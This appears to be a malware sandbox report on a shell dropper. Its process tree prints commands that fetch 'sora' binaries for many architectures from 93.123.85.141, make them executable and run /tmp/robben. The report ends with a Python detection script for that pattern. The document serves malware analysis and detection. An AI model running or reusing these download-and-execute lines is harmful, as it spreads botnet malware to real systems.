Analysis
max time kernel: 42s
max time network: 45s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 01:47
Static task: static1
Behavioral task: behavioral1
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
  Resource: debian9-mipsel-20240611-en
General
Target: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Size: 2KB
MD5: 891d1dcbed8ea0751d0c0d0fec39ae18
SHA1: 57db06f345b0d9b4e2a7f4a502678a82ed792174
SHA256: 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
SHA512: 20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 727 chmod, 737 chmod, 743 chmod, 749 chmod, 765 chmod, 781 chmod, 799 chmod, 816 chmod, 824 chmod, 833 chmod, 855 chmod, 872 chmod, 881 chmod, 887 chmod
- Executes dropped EXE (14 IoCs)
  ioc / pid / Process: /tmp/robben, executed as robben with PIDs 728, 738, 744, 750, 766, 782, 800, 817, 825, 834, 857, 874, 882, 888
- Reads runtime system information (14 IoCs)
  description / ioc / Process: File opened for reading /proc/sys/crypto/fips_enabled, curl (one hit per curl invocation, 14 in total). This read is the FIPS-mode check performed by the TLS library linked into curl, not behaviour of the sample itself; treat it as noise when building detections from this report.
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid / Process: 732 wget, 733 curl, 736 cat
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description / ioc / Process: File opened for modification /tmp/robben, 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
- /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh (PID 700): /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh [Writes file to tmp directory]
  - /usr/bin/wget (PID 705): wget http://93.123.85.141/bins/sora.x86
  - /usr/bin/curl (PID 715): curl -O http://93.123.85.141/bins/sora.x86 [Reads runtime system information]
  - /bin/cat (PID 725): cat sora.x86
  - /bin/chmod (PID 727): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 728): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 732): wget http://93.123.85.141/bins/sora.mips [System Network Configuration Discovery]
  - /usr/bin/curl (PID 733): curl -O http://93.123.85.141/bins/sora.mips [Reads runtime system information; System Network Configuration Discovery]
  - /bin/cat (PID 736): cat sora.mips [System Network Configuration Discovery]
  - /bin/chmod (PID 737): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 738): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 740): wget http://93.123.85.141/bins/sora.x86_64
  - /usr/bin/curl (PID 741): curl -O http://93.123.85.141/bins/sora.x86_64 [Reads runtime system information]
  - /bin/cat (PID 742): cat sora.x86_64
  - /bin/chmod (PID 743): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 744): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 746): wget http://93.123.85.141/bins/sora.i468
  - /usr/bin/curl (PID 747): curl -O http://93.123.85.141/bins/sora.i468 [Reads runtime system information]
  - /bin/cat (PID 748): cat sora.i468
  - /bin/chmod (PID 749): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 750): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 752): wget http://93.123.85.141/bins/sora.i686
  - /usr/bin/curl (PID 756): curl -O http://93.123.85.141/bins/sora.i686 [Reads runtime system information]
  - /bin/cat (PID 764): cat sora.i686
  - /bin/chmod (PID 765): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 766): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 769): wget http://93.123.85.141/bins/sora.mpsl
  - /usr/bin/curl (PID 772): curl -O http://93.123.85.141/bins/sora.mpsl [Reads runtime system information]
  - /bin/cat (PID 780): cat sora.mpsl
  - /bin/chmod (PID 781): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 782): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 785): wget http://93.123.85.141/bins/sora.arm4
  - /usr/bin/curl (PID 787): curl -O http://93.123.85.141/bins/sora.arm4 [Reads runtime system information]
  - /bin/cat (PID 796): cat sora.arm4
  - /bin/chmod (PID 799): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 800): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 802): wget http://93.123.85.141/bins/sora.arm5
  - /usr/bin/curl (PID 807): curl -O http://93.123.85.141/bins/sora.arm5 [Reads runtime system information]
  - /bin/cat (PID 815): cat sora.arm5
  - /bin/chmod (PID 816): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 817): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 820): wget http://93.123.85.141/bins/sora.arm6
  - /usr/bin/curl (PID 822): curl -O http://93.123.85.141/bins/sora.arm6 [Reads runtime system information]
  - /bin/cat (PID 823): cat sora.arm6
  - /bin/chmod (PID 824): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE [File and Directory Permissions Modification]
  - /tmp/robben (PID 825): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 827): wget http://93.123.85.141/bins/sora.arm7
  - /usr/bin/curl (PID 829): curl -O http://93.123.85.141/bins/sora.arm7 [Reads runtime system information]
  - /bin/cat (PID 832): cat sora.arm7
  - /bin/chmod (PID 833): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 834): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 836): wget http://93.123.85.141/bins/sora.ppc
  - /usr/bin/curl (PID 847): curl -O http://93.123.85.141/bins/sora.ppc [Reads runtime system information]
  - /bin/cat (PID 854): cat sora.ppc
  - /bin/chmod (PID 855): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 857): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 859): wget http://93.123.85.141/bins/sora.ppc440fp
  - /usr/bin/curl (PID 863): curl -O http://93.123.85.141/bins/sora.ppc440fp [Reads runtime system information]
  - /bin/cat (PID 870): cat sora.ppc440fp
  - /bin/chmod (PID 872): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 874): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 876): wget http://93.123.85.141/bins/sora.m68k
  - /usr/bin/curl (PID 879): curl -O http://93.123.85.141/bins/sora.m68k [Reads runtime system information]
  - /bin/cat (PID 880): cat sora.m68k
  - /bin/chmod (PID 881): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 882): ./robben jaws.exploit [Executes dropped EXE]
  - /usr/bin/wget (PID 884): wget http://93.123.85.141/bins/sora.sh4
  - /usr/bin/curl (PID 885): curl -O http://93.123.85.141/bins/sora.sh4 [Reads runtime system information]
  - /bin/cat (PID 886): cat sora.sh4
  - /bin/chmod (PID 887): chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben [File and Directory Permissions Modification]
  - /tmp/robben (PID 888): ./robben jaws.exploit [Executes dropped EXE]
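Added example, not part of the sandbox report and not the sample's own code: detection logic for the chain the process tree above shows. The dropper fetches sora.<arch> for 14 architectures from a single host with both wget and curl, runs cat on the fetched file (the redirection into robben is not visible in the tree but is implied by the "Writes file to tmp directory" hit on /tmp/robben), marks files executable, and executes /tmp/robben with the argument jaws.exploit. The chmod argument lists for PIDs 727 through 824 also contain a systemd-private-* directory, which is consistent with a `chmod +x *` glob expanding in /tmp rather than an explicit file list; that is an inference, not something the report states. The event tuples, the sequential PIDs from 701 onward, and the `analyze` function are assumptions of this example; the URLs, host, architecture suffixes, file names and argument are taken from the report.

```python
"""Added example: offline detection of the multi-architecture downloader
pattern seen in the process tree above, run over constructed events."""
import re
from collections import Counter
from urllib.parse import urlparse

# Values taken from the report above.
SCRIPT = "5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh"
HOST = "93.123.85.141"
ARCHS = ["x86", "mips", "x86_64", "i468", "i686", "mpsl", "arm4", "arm5",
         "arm6", "arm7", "ppc", "ppc440fp", "m68k", "sh4"]

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def build_sample_events():
    """Construct (pid, ppid, image, cmdline) tuples mirroring the tree above:
    per architecture, wget, curl -O, cat, chmod +x, then ./robben.
    The tuple format and the sequential PIDs are assumptions of this example."""
    events = [(700, 1, f"/tmp/{SCRIPT}", f"/tmp/{SCRIPT}")]
    pid = 701
    for arch in ARCHS:
        url = f"http://{HOST}/bins/sora.{arch}"
        steps = [
            ("/usr/bin/wget", f"wget {url}"),
            ("/usr/bin/curl", f"curl -O {url}"),
            ("/bin/cat", f"cat sora.{arch}"),  # redirect into robben not visible in the tree
            ("/bin/chmod", f"chmod +x {SCRIPT} robben"),
            ("/tmp/robben", "./robben jaws.exploit"),
        ]
        for image, cmd in steps:
            events.append((pid, 700, image, cmd))
            pid += 1
    return events


def analyze(events):
    """Group children by parent PID and look for: several arch-suffixed
    downloads from one host, chmod +x on a file, then execution of that file
    from a world-writable directory. Returns one finding per suspicious parent."""
    by_parent = {}
    for pid, ppid, image, cmd in events:
        by_parent.setdefault(ppid, []).append((pid, image, cmd))

    findings = []
    for ppid, children in by_parent.items():
        hosts, suffixes, chmod_targets, execs = Counter(), set(), set(), []
        for pid, image, cmd in children:
            argv = cmd.split()
            if not argv:
                continue
            name = argv[0].rsplit("/", 1)[-1]  # "./robben" -> "robben"
            if name in DOWNLOADERS:
                for url in URL_RE.findall(cmd):
                    parsed = urlparse(url)
                    hosts[parsed.hostname] += 1
                    suffixes.add(parsed.path.rsplit(".", 1)[-1])  # sora.mpsl -> mpsl
            elif name == "chmod" and "+x" in argv:
                chmod_targets.update(argv[argv.index("+x") + 1:])
            elif image.startswith(WRITABLE_DIRS):
                execs.append({"pid": pid, "image": image, "args": argv[1:]})

        # Executions whose basename was a chmod +x target in the same parent.
        chmod_then_exec = sorted({e["image"] for e in execs
                                  if e["image"].rsplit("/", 1)[-1] in chmod_targets})
        if len(suffixes) >= 3 and chmod_then_exec:
            verdict = "multi-arch-downloader"
        elif execs:
            verdict = "exec-from-writable-dir"
        else:
            continue
        findings.append({
            "parent_pid": ppid,
            "verdict": verdict,
            "download_hosts": dict(hosts),
            "arch_suffixes": sorted(suffixes),
            "chmod_then_exec": chmod_then_exec,
            "tmp_execs": execs,
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(build_sample_events()):
        print(finding["verdict"], finding["parent_pid"], finding["download_hosts"],
              finding["arch_suffixes"], finding["chmod_then_exec"])
```

On the constructed events this yields two findings: the script itself flagged for executing from /tmp under PID 1, and PID 700 flagged as a multi-arch downloader with 28 fetches from 93.123.85.141, 14 distinct suffixes and /tmp/robben as the chmod-then-exec target. The threshold of three suffixes is a tuning choice; a single wget of one binary followed by an exec from /tmp still surfaces as exec-from-writable-dir.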